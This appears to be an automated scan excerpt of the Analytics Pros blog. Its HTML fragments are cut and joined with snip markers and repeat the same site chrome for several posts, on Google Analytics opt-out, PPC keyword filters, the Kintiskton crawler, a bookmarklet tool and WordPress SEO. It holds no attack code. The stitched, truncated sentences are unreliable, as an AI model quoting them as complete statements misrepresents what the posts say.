...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>This morning I noticed a short <a target="_blank" href="http://analytics.blogspot.com/2010/03/more-choice-for-users-browser-based-opt.html">post on the Google Analytics blog</a> ...[SNIP]... <li>Furthermore, is opting out of Google Analytics even an important thing?.. GA already prevents collection of Personally Identifiable Information through its <a target="_blank" href="http://www.google.com/analytics/tos.html">Terms of Service</a> ...[SNIP]... d, if you don't want to be tracked by GA, you can block all cookies, or modify your browser to selectively block cookies using the Google Analytics cookie names, or get one of the existing plug-ins to <a target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/1865">block GA and other measurement and ad serving systems</a> ...[SNIP]... </em> of privacy and a false-sense that you're not being tracked... I doubt many people know how many retailers can <a target="_blank" href="http://www.aimetis.com/Solutions/Retail.aspx">track their movements through malls and stores</a> using cameras connected to huge computer systems and artificial intelligence systems that identify shoplifters automatically, <a target="_blank" href="http://www.axis.com/files/user_scenarios/ap_ret_merchandising_31107_en_0803_lo.pdf">measure the paths customers take through aisles</a>, identify if in-store signage is being looked at, and <a target="_blank" href="http://www.lighthauslogic.com/retail_solutions.html">conduct facial recognition</a> for "demographics and segmentation"... There are <a target="_blank" href="http://www.milestonesys.com/news/videos/viewVideo?Title=Smart_Client_5.0_Demonstration&id=4313">many more examples of this technology</a> out there (like <a target="_blank" href="http://www.vuitcommunications.com/">this</a>, and <a target="_blank" href="http://www.videosurveillance.com/department-stores.asp">this</a> ...[SNIP]... </a> that can analyze logfiles, not relying on cookies or script tags, or solutions like <a target="_blank" href="http://analytics.blogspot.com/2010/03/no-tags-google-analytics-integration.html">Pion Lite</a>, <a target="_blank" href="http://www.tealeaf.com/">Tealeaf</a>, or <a target="_blank" href="http://www.coradiant.com/">Coradiant</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>A couple years ago the folks at <a href="http://www.omegadm.co.uk/" target="_blank">Omega Digital Media</a> and <a href="http://www.ga-experts.com/" target="_blank">GA Experts</a> collaborated on a <a href="http://www.ga-experts.com/blog/2006/11/how-to-get-detailed-ppc-keyword-data-from-google-analytics/" target="_blank">filter to combine the actual search term</a> (say, "size 12 men's running shoes") <a href="http://www.ga-experts.com/blog/2006/11/how-to-get-detailed-ppc-keyword-data-from-google-analytics/" target="_blank">with the bidded term</a> (say, "mens running shoes"). .. I was replying to a <a href="http://www.google.com/support/forum/p/Google+Analytics/thread?tid=3b79c0131cf3148d&hl=en" target="_blank">post</a> on the <a href="http://www.google.com/support/forum/p/Google+Analytics/" target="_blank">Google Analytics Help Forum</a> last year and wanted to reference the filter settings, but couldn't find the original post, so I've decided to write my own. .. Original credit for the idea goes to <a href="http://www.ga-experts.com/blog/2006/11/how-to-get-detailed-ppc-keyword-data-from-google-analytics/" target="_blank">Jim Newsome at Omega</a> ...[SNIP]... ith the keyword field! .. If you do, in many situations you're going to see data errors. .. It also makes easy drill-down much harder. .. If you want more powerful CPC and SEM analysis, consider using <a href="http://www.google.com/urchin/" target="_self" title="Urchin 6 Web Analytics Software from Google">Urchin 6</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <li><a href="http://www.blogtactic.com/2009/01/traffic-spike-from-kintiskton-llc.html" target="_blank">http://www.blogtactic.com/2009/01/traffic-spike-from-kintiskton-llc.html</a> ...[SNIP]... <li><a href="http://www.google.com/support/forum/p/Google+Analytics/thread?tid=1db75dde1659d09d&hl=en" target="_blank">http://www.google.com/support/forum/p/Google+Analytics/thread?tid=1db75dde1659d09d&hl=en</a> ...[SNIP]... </strong> with JS functions. It reminds me of the post a while back from Google about their <a href="http://googlewebmastercentral.blogspot.com/2008/04/crawling-through-html-forms.html" target="_blank">experimental crawler that is able to partially post forms</a> ...[SNIP]... <p>Could Kintiskton be a Google "superbot" operating under a cloak provided by this ghost company? I ran a business license search in CA, Nevada, and Delaware and found <a href="https://sos-res.state.de.us/tin/controller?JSPName=GINAMESEARCH&action=Get%20Entity%20Details&frmFileNumber=4540856" target="_blank">Kintiskton LLC is licensed in Delaware </a>as an LLC, formed on 5/1/2008, and has a registered agent of "The Corporation Trust Company" on Orange Street in Wilmington, Delaware. Helpful... Look it up for yourself using the <a href="https://sos-res.state.de.us/tin/GINameSearch.jsp" target="_blank">Delaware Department of State Corporation Division search tool</a>, or just go to the <a href="https://sos-res.state.de.us/tin/controller?JSPName=GINAMESEARCH&action=Get%20Entity%20Details&frmFileNumber=4540856" target="_blank">detail page for Kintiskton LLC</a> ...[SNIP]... <p>The Kintiskton IP addresses captured by <a href="http://groups.google.com/group/analytics-help-misc/browse_thread/thread/ee38b2ff24a9a5c9" target="_blank">others reporting scans from this bot</a> ...[SNIP]... <p>Thanks to John Henson at LunaMetrics, a fantastic <a href="http://www.lunametrics.com/" target="_blank">Google Analytics Authorized Consultant</a> ...[SNIP]... <p>See <a href="http://endellion.me.uk/info/Kintiskton.html" target="_blank">this excellent post about Kintiskton</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... </em> to announce the release of a new Google Analytics enhancement tool by Analytics Pros I'm calling "Dimensionator." If you know your sci-fi you should already be upset that I've mised the <a href="http://en.wikipedia.org/wiki/Borg_%28Star_Trek%29" target="_blank">Borg</a> and <a href="http://en.wikipedia.org/wiki/Terminator_%28character_concept%29" target="_blank">Terminator</a> ...[SNIP]... <p>It's a <a href="http://en.wikipedia.org/wiki/Bookmarklet" target="_blank">bookmarklet</a> ...[SNIP]... </a> and follow the instructions. Starting over three years ago I began discovering the extra dimensions that aren't listed in the Google Analytics dimensions list. I setup individual <a href="http://en.wikipedia.org/wiki/Bookmarklet" target="_blank">bookmarklets</a> ...[SNIP]... <p>Dimensionator achieves a similar result to the modified dimensions list from the <a href="http://www.roirevolution.com/blog/2008/06/google_analytics_report_enhancer.html" target="_blank">Google Analytics Report Enhancer</a> by <a href="http://www.roirevolution.com/" target="_blank">ROI Revolution</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>Some time ago I came across a fabulous tip from <a target="_blank" href="http://andrescholten.nl/">Andre Scholten</a> posted on <a target="_blank" href="http://yoast.com/track-seo-rankings-google-analytics/">Yoast</a> ...[SNIP]... <p>I came across a link this morning to what I have to say is one of the <a target="_blank" href="http://wordpress.tv/2009/05/30/matt-cutts-google-sf09/">best talks on Search Engine Optimization</a> I've ever seen. ..It's a video of <a target="_blank" href="http://www.mattcutts.com/blog/">Matt Cutts</a> speaking at the <a target="_blank" href="http://2009.sf.wordcamp.org/">WordCamp San Francisco 2009</a> about search engine optimization and <a target="_blank" href="http://wordpress.org/">WordPress</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>I came across a link this morning to what I have to say is one of the <a target="_blank" href="http://wordpress.tv/2009/05/30/matt-cutts-google-sf09/">best talks on Search Engine Optimization</a> I've ever seen. ..It's a video of <a target="_blank" href="http://www.mattcutts.com/blog/">Matt Cutts</a> speaking at the <a target="_blank" href="http://2009.sf.wordcamp.org/">WordCamp San Francisco 2009</a> about search engine optimization and <a target="_blank" href="http://wordpress.org/">WordPress</a> ...[SNIP]... ess is that "it solves 80 - 90% of the mechanics of search engine optimization." ..I have to agree with him and I love to work with WordPress (admittedly I don't always use it... this site is built in <a target="_blank" href="http://www.joomla.org/">Joomla</a> ...[SNIP]... <p>What most people fail to realize about SEO is that your choice of <a target="_blank" href="http://en.wikipedia.org/wiki/Content_management_system">Content Management System</a> largely determines the fate of your exposure to and success with search engines. ..While there are an overwhelming myriad of <a target="_blank" href="http://www.cmsmatrix.org/">CMS choices</a> ...[SNIP]... that use a mis-mash of 302 redirects and "document codes" to make it easy for lazy editors to never have to update links within content cause untold damage to search ranking equity. ..One particularly <a target="_blank" href="http://websolutions.opentext.com/company_press_releases_cms_liveserver_launch.htm">stupid CMS</a> ...[SNIP]... <p>I just can't underscore enough the importance of selecting a CMS that won't ruin your chances of SEO, or else hire an <a target="_blank" href="http://www.pop.us/#/about/what-we-do/technology/">agency with super-expert software developers</a> ...[SNIP]... </a>I snapped a screenshot from the <a target="_blank" href="http://wordpress.tv/2009/05/30/matt-cutts-google-sf09/">video</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://codex.wordpress.org/Plugins/Akismet">Akismet</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wordpress.org/extend/plugins/cookies-for-comments/">Cookies for Comments</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wordpress.org/extend/plugins/enforce-www-preference/">Enforce www preference</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wpgpl.com/wordpress-plugins/feedburner-feedsmith-wordpress-plugin/">FeedBurner FeedSmith</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wordpress.org/extend/plugins/wp-super-cache/">WP Super Cache</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>While writing a response on the <a href="http://www.google.com/support/forum/p/Google+Analytics?hl=en" target="_blank">new Google Analytics help forum</a> to a <a href="http://www.google.com/support/forum/p/Google+Analytics/thread?tid=64a7beca74e5a674&hl=en" target="_blank">question about e-commerce dimensions</a> ...[SNIP]... </strong> over at <a href="http://www.roirevolution.com/" target="_blank">ROI Revolution</a> found the <a href="http://www.roirevolution.com/blog/2008/05/segmenting_by_sourcemedium_and_other_stories.html" target="_blank">some of the same tidbits of analytics delight</a> and went so far as creating a fabulous <a href="http://www.roirevolution.com/blog/2008/10/google_analytics_report_enhancer_updates.html" target="_blank">Firefox plug-in for easily accessing these segments</a> ...[SNIP]... <p>The first three of the 36+ additional segments I want to cover are withing the e-commerce group. They are the billing city, state, and country fields that can be populated via the <a href="http://code.google.com/apis/analytics/docs/gaJSApiEcommerce.html#_gat.GA_Tracker_._addTrans" target="_blank">addTrans() function</a> ...[SNIP]... s like you...re PII is assigned to the ...ct... parameter in the query string, which of course is not a GA parameter. So it...s definitely not stored in any campaign tags. It could possibly show up <a href="http://www.cwnaexams.com/">cwna exam</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <li><a href="http://www.blogtactic.com/2009/01/traffic-spike-from-kintiskton-llc.html" target="_blank">http://www.blogtactic.com/2009/01/traffic-spike-from-kintiskton-llc.html</a> ...[SNIP]... <li><a href="http://www.google.com/support/forum/p/Google+Analytics/thread?tid=1db75dde1659d09d&hl=en" target="_blank">http://www.google.com/support/forum/p/Google+Analytics/thread?tid=1db75dde1659d09d&hl=en</a> ...[SNIP]... </strong> with JS functions. It reminds me of the post a while back from Google about their <a href="http://googlewebmastercentral.blogspot.com/2008/04/crawling-through-html-forms.html" target="_blank">experimental crawler that is able to partially post forms</a> ...[SNIP]... <p>Could Kintiskton be a Google "superbot" operating under a cloak provided by this ghost company? I ran a business license search in CA, Nevada, and Delaware and found <a href="https://sos-res.state.de.us/tin/controller?JSPName=GINAMESEARCH&action=Get%20Entity%20Details&frmFileNumber=4540856" target="_blank">Kintiskton LLC is licensed in Delaware </a>as an LLC, formed on 5/1/2008, and has a registered agent of "The Corporation Trust Company" on Orange Street in Wilmington, Delaware. Helpful... Look it up for yourself using the <a href="https://sos-res.state.de.us/tin/GINameSearch.jsp" target="_blank">Delaware Department of State Corporation Division search tool</a>, or just go to the <a href="https://sos-res.state.de.us/tin/controller?JSPName=GINAMESEARCH&action=Get%20Entity%20Details&frmFileNumber=4540856" target="_blank">detail page for Kintiskton LLC</a> ...[SNIP]... <p>The Kintiskton IP addresses captured by <a href="http://groups.google.com/group/analytics-help-misc/browse_thread/thread/ee38b2ff24a9a5c9" target="_blank">others reporting scans from this bot</a> ...[SNIP]... 